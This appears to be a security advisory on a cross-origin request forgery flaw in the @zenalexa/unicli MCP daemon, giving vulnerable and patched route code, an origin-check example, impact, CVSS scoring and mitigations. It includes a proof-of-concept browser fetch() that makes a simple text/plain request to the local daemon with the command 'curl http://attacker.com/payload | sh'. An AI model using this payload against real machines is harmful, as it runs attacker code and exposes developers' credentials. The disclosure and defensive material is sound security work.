Jun 22, 2026
A vulnerability in @zenalexa/unicli allows malicious websites to execute arbitrary local system commands on a developer's machine by sending unauthenticated cross-origin requests to the local daemon.
An origin validation error and cross-site request forgery vulnerability in @zenalexa/unicli prior to version 0.225.2 allows cross-origin web applications to execute arbitrary tools on a user's local machine via the legacy stateless HTTP transport.
The Model Context Protocol (MCP) is an open standard designed to facilitate communication between Large Language Model applications and external data sources or local development tools. The @zenalexa/unicli package implements a CLI client and daemon supporting MCP. To enable external applications to interface with local development assets, the CLI exposes an HTTP daemon. This daemon listens on the loopback interface (localhost or 127.0.0.1) and parses incoming requests to trigger system commands.
In versions of @zenalexa/unicli prior to 0.225.2, this daemon included a legacy stateless HTTP transport mechanism. The stateless transport was bound to a loopback port but lacked any checks to verify the source of incoming HTTP connections. This omitted validation created an open attack surface on any workstation running the daemon.
This issue represents a combination of an Origin Validation Error (CWE-346) and Cross-Site Request Forgery (CWE-352). Because the browser's Same-Origin Policy does not stop cross-origin simple requests from reaching local network services (it only withholds the response from the page), malicious external web pages could send arbitrary instructions to the loopback service. The resulting exploitation could allow unauthenticated command execution under the credentials of the local user running the daemon.
The underlying vulnerability stems from how the legacy stateless HTTP transport processed incoming HTTP request headers. Web browsers implement the Same-Origin Policy (SOP) to isolate resources loaded from different origins. However, the browser SOP allows websites to send Cross-Origin Resource Sharing (CORS) "simple requests" without initiating a preflight OPTIONS handshake. A standard POST request whose Content-Type header is text/plain qualifies as a simple request, so the browser transmits the body to the local server immediately, without first asking the server (via preflight) whether the cross-origin request is permitted.
The Uni-CLI legacy stateless HTTP handler processed all incoming payloads on the /mcp route directly as JSON-RPC instructions. It did not examine the Origin header to ensure the request originated from a trusted client application or the loopback domain. As a result, when the web browser executed the cross-origin request, the loopback daemon parsed and executed the command payload contained in the request body.
This behavior highlights a significant security posture drift within the Uni-CLI code base. The newer Streamable HTTP transport implementation in the same package utilized rigorous routing guards. These guards checked the incoming Origin and restricted communication to explicitly trusted endpoints. The legacy stateless HTTP transport bypassed these middleware validations entirely, maintaining an unauthenticated pathway directly into the core command dispatcher.
The vulnerability was located in the legacy route handler that received incoming stateless JSON-RPC calls. Before the fix in version 0.225.2, the handler processed the HTTP request body directly. It passed the JSON content to the command executor without validating the headers.
```javascript
// BEFORE: Vulnerable route handling in legacy stateless transport
app.post('/mcp', (req, res) => {
  // Missing check for the 'Origin' header: any cross-origin browser request reaches the dispatcher
  const payload = JSON.parse(req.body); // body arrives as text/plain and is parsed as JSON regardless
  dispatcher.execute(payload)
    .then(result => res.json(result))
    .catch(err => res.status(500).json({ error: err.message }));
});
```

The remediation resolved this issue by introducing a unified origin-validation middleware. This middleware executes before routing requests for both the legacy and modern transport layers. It inspects the Origin header and rejects any request whose Origin does not name a trusted loopback origin.
```javascript
// AFTER: Patched route handling with global Origin validation middleware
function originGuard(req, res, next) {
  const origin = req.headers['origin'];
  // If the Origin header exists and is not a loopback origin, block the request.
  // isLocalOrigin() is the package's loopback whitelist check (not shown on this page).
  if (origin && !isLocalOrigin(origin)) {
    return res.status(403).send('Forbidden: Cross-origin requests are blocked');
  }
  next(); // no Origin header (non-browser client) or a loopback origin: continue to routing
}
app.use(originGuard); // registered before the routes, so it covers every transport
app.post('/mcp', (req, res) => {
  const payload = JSON.parse(req.body);
  dispatcher.execute(payload)
    .then(result => res.json(result))
    .catch(err => res.status(500).json({ error: err.message }));
});
```

This structural fix ensures that standard browser cross-origin requests are terminated at the HTTP entry point. Because non-browser clients (such as local CLI tools) do not attach an Origin header, they continue to work without modification. Browsers always attach an Origin header to cross-origin POST requests, so every browser-originated request is evaluated against the strict loopback domain whitelist.
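The guard above depends on how strictly the Origin value is compared. The following is an added example, not code from the @zenalexa/unicli project, of a loopback-only Origin check written as pure functions so it can be tested without Express; the names isLocalOrigin, checkOrigin and the sample headers are assumptions constructed for the example, and it also covers cases the advisory does not spell out (lookalike hostnames and the literal "null" origin).

```javascript
// Added example (not the project's code): a loopback-only Origin guard as pure functions.
const LOCAL_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);

// Parse the Origin header with the WHATWG URL parser and compare the host exactly.
// A substring test such as origin.includes('localhost') would accept
// http://localhost.attacker.example; exact hostname comparison does not.
function isLocalOrigin(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch {
    return false; // "null" (sandboxed iframe / file://), garbage or relative strings: not local
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return LOCAL_HOSTS.has(url.hostname); // Node keeps the brackets on IPv6 hostnames
}

// Decision for one request, given its (lowercased) header map.
// Non-browser clients (curl, the CLI itself) send no Origin header and are allowed
// unchanged, matching the behaviour of the patched middleware described above.
function checkOrigin(headers) {
  const origin = headers['origin'];
  if (origin === undefined) {
    return { allowed: true, status: 200, reason: 'no Origin header (non-browser client)' };
  }
  if (isLocalOrigin(origin)) {
    return { allowed: true, status: 200, reason: 'loopback origin' };
  }
  return { allowed: false, status: 403, reason: 'cross-origin request blocked' };
}

// Constructed sample header sets mirroring the request shapes discussed in the advisory.
// Note that Content-Type is irrelevant to the decision: text/plain only avoids the preflight.
const SAMPLES = {
  browserExploit: { origin: 'https://attacker.example', 'content-type': 'text/plain' },
  localCli:       { 'content-type': 'application/json' },
  localWebUi:     { origin: 'http://localhost:8080', 'content-type': 'text/plain' },
  lookalike:      { origin: 'http://localhost.attacker.example', 'content-type': 'text/plain' },
  sandboxedNull:  { origin: 'null', 'content-type': 'text/plain' },
};

for (const [name, headers] of Object.entries(SAMPLES)) {
  const d = checkOrigin(headers);
  console.log(`${name.padEnd(15)} -> ${d.status} (${d.reason})`);
}
```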
An attacker can exploit this vulnerability by hosting a malicious website and inducing the victim to visit it while the Uni-CLI daemon is running. Because the daemon listens on a predictable loopback port, the malicious website can run background JavaScript to send cross-origin requests to typical local ports.
To avoid triggering a CORS preflight, the request is structured as a CORS-simple request. The script sets the Content-Type header to text/plain but embeds a valid JSON-RPC payload in the body. The local daemon receives the text body, parses it as JSON anyway, and executes the contained instructions.
```javascript
// Example exploit payload running within the victim's browser
fetch('http://localhost:8080/mcp', {
  method: 'POST',
  headers: {
    'Content-Type': 'text/plain' // keeps the request "simple": no preflight is sent
  },
  body: JSON.stringify({
    jsonrpc: '2.0',
    method: 'tools/call',
    params: {
      name: 'execute_command',
      arguments: {
        cmd: 'curl http://attacker.com/payload | sh'
      }
    },
    id: 1
  })
});
```

Because the request originates from the local browser running on the victim's workstation, the destination IP address is 127.0.0.1 or localhost. The local operating system forwards the request to the loopback-bound Uni-CLI daemon, which processes the payload as if it came from a trusted local application.
The impact of successful exploitation is critical. By triggering arbitrary tools/call operations, a remote attacker can run arbitrary tools configured in the victim's Uni-CLI instance. These tools often have access to local file systems, secure environment variables, and local command execution capabilities.
Because the command executes on the victim's local machine, the attacker obtains the privilege level of the user running the Uni-CLI daemon. If the developer runs the daemon with administrative privileges or has access to local SSH keys, credentials, or API keys, the attacker can extract these secrets. The remote entity can then pivot into internal corporate resources or cloud environments using the compromised credentials.
The vulnerability receives a CVSS v4.0 score of 8.6, representing high confidentiality and integrity impact with low attack complexity. Although user interaction is required (visiting the malicious page), the attack does not require any prior configuration knowledge or authentication credentials, making it highly reliable once a target visits the site.
The primary remediation strategy is upgrading the @zenalexa/unicli package to version 0.225.2 or later. This update introduces the unified Origin validation middleware which protects the /mcp HTTP endpoint against cross-origin browser requests.
If upgrading is not immediately possible, administrators should disable the legacy stateless HTTP transport. Restricting CLI transport mechanisms to stdio or migrating completely to the secured Streamable HTTP transport mitigates the attack vector. These alternatives do not expose an unauthenticated HTTP endpoint on the loopback interface.
Additionally, firewall configurations or host-based security tools can restrict access to loopback ports. Standard network security practices should ensure that any local service binding to loopback interfaces cannot be accessed by untrusted host processes. Software developers should continuously monitor and align the security postures of all exposed communication channels.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| @zenalexa/unicli Uni-CLI | < 0.225.2 | 0.225.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-346, CWE-352 |
| Attack Vector | Network / Cross-Origin HTTP Request |
| CVSS v4.0 Score | 8.6 (High) |
| EPSS Score | N/A |
| Exploit Status | None / Proof of Concept Not Weaponized |
| Impact | Arbitrary Tool / Command Execution on Host |
| KEV Status | Not Listed |
The application does not validate that the Origin header matches expected local domains, allowing malicious cross-origin scripts to make state-changing requests.